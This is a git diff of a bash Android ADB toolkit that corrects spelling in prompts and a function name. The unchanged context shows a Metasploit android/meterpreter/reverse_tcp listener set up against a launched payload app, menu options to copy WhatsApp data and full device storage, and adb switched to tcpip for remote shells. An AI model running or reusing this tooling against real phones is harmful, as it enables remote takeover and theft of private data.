diff --git a/modules/2opt2 b/modules/2opt2
index a113db2..0c195d3 100644
--- a/modules/2opt2
+++ b/modules/2opt2
@@ -103,10 +103,10 @@ apk_install () {
         fi
 }
 
-start_listner () {
+start_listener () {
 
      adb -s $devv shell monkey -p com.metasploit.stage -c android.intent.category.LAUNCHER 1 >/dev/null 2>&1 | echo -e "\e[1;93mLaunching the PAYLOAD.\e[0m"; echo -e "\n\e[1;92mDone\n"
-     echo -e "\e[1;92mStarting the MSF listner\n"
+     echo -e "\e[1;92mStarting the MSF listener\n"
      time=$(date +"%T")
      echo -e "use exploit/multi/handler\nset PAYLOAD android/meterpreter/reverse_tcp\nset LHOST $lhost1\nset LPORT $lport1\nexploit" > $PWD/metasploit/.exploit-$time.rc
      msfconsole -q -r $PWD/metasploit/.exploit-$time.rc
@@ -131,11 +131,11 @@ dev_1_payload_create () {
                   esac
                 done
                 while true; do
-                  read -p $'\e[93;1mDo you want to start the MSF listner.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
+                  read -p $'\e[93;1mDo you want to start the MSF listener.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
                   case $yn in
-                  [Yy]* ) start_listner; break;;
+                  [Yy]* ) start_listener; break;;
                   [Nn]* ) clear && bash modules/function2.sh;;
-                      * ) start_listner; break;;
+                      * ) start_listener; break;;
                   esac
                 done
 }
@@ -157,11 +157,11 @@ dev_2_payload_create () {
                   esac
                 done
                 while true; do
-                  read -p $'\e[93;1mDo you want to start the MSF listner.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
+                  read -p $'\e[93;1mDo you want to start the MSF listener.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
                   case $yn in
-                  [Yy]* ) start_listner; break;;
+                  [Yy]* ) start_listener; break;;
                   [Nn]* ) clear && bash modules/function2.sh;;
-                      * ) start_listner; break;;
+                      * ) start_listener; break;;
                   esac
                 done
 }
@@ -183,11 +183,11 @@ dev_3_payload_create () {
                   esac
                 done
                 while true; do
-                  read -p $'\e[93;1mDo you want to start the MSF listner.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
+                  read -p $'\e[93;1mDo you want to start the MSF listener.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
                   case $yn in
-                  [Yy]* ) start_listner; break;;
+                  [Yy]* ) start_listener; break;;
                   [Nn]* ) clear && bash modules/function2.sh;;
-                      * ) start_listner; break;;
+                      * ) start_listener; break;;
                   esac
                 done
 
diff --git a/modules/function2.sh b/modules/function2.sh
index 14316bb..e1b4574 100644
--- a/modules/function2.sh
+++ b/modules/function2.sh
@@ -41,7 +41,7 @@ option2_list () {
         echo -e "\n\e[1;93m5.   \e[1;92mGO BACK TO ADB-Toolkit"
         echo -e "\e[1;92mEXIT or press Ctrl+c\n"
         echo -e $revised
-        read -p $'\n\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTED NUMBER\e[0m\e[24;1;97m : ' options2
+        read -p $'\n\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTIVE NUMBER\e[0m\e[24;1;97m : ' options2
 
 }
 
diff --git a/modules/funtion.sh b/modules/funtion.sh
index 080460b..82965a9 100644
--- a/modules/funtion.sh
+++ b/modules/funtion.sh
@@ -65,7 +65,7 @@ echo -e "\e[1;93m21.  \e[1;92mCOPY ALL WHATSAPP DATA"
 echo -e "\e[1;93m22.  \e[1;92mCOPY ALL DEVICE STORAGE ( Takes time )           \e[1;93mA.  \e[1;92mABOUT AUTHOUR "
 echo -e "\e[1;93m23.  \e[1;92mCOPY A SPECIFIED FILE OR FOLDER                  \e[1;91mEXIT or press Ctrl+c\n"
 echo -e $revised
-read -p $'\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTED NUMBER\e[0m\e[24;1;97m : ' options
+read -p $'\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTIVE NUMBER\e[0m\e[24;1;97m : ' options
  
 }
 
diff --git a/modules/opt16 b/modules/opt16
index 295c08d..c37fc5a 100644
--- a/modules/opt16
+++ b/modules/opt16
@@ -61,7 +61,7 @@ remote_shell () {
 dev_1_remo () {
 
               devvv=$(echo "$dev_1")
-              echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_1 \e[1;93mis connected to the same network in which ADB-Tookit is installed.\n"
+              echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_1 \e[1;93mis connected to the same network in which ADB-Toolkit is installed.\n"
               ip_finder
               adb -s $dev_1 tcpip 5555 > /dev/null 2>&1
               connect_msg=$(adb -s $dev_1 connect $dev_ip) > /dev/null 2>&1
@@ -79,7 +79,7 @@ dev_1_remo () {
 dev_2_remo () {
 
               devvv=$(echo "$dev_2")
-              echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_2 \e[1;93mis connected to the same network in which ADB-Tookit is installed.\n"
+              echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_2 \e[1;93mis connected to the same network in which ADB-Toolkit is installed.\n"
               ip_finder
               adb -s $dev_2 tcpip 5555 > /dev/null 2>&1
               connect_msg=$(adb -s $dev_2 connect $dev_ip) > /dev/null 2>&1
@@ -98,7 +98,7 @@ dev_2_remo () {
 dev_3_remo () {
 
               devvv=$(echo "$dev_3")
-              echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_3 \e[1;93mis connected to the same network in which ADB-Tookit is installed.\n"
+              echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_3 \e[1;93mis connected to the same network in which ADB-Toolkit is installed.\n"
               ip_finder
               adb -s $dev_3 tcpip 5555 > /dev/null 2>&1
               connect_msg=$(adb -s $dev_3 connect $dev_ip) > /dev/null 2>&1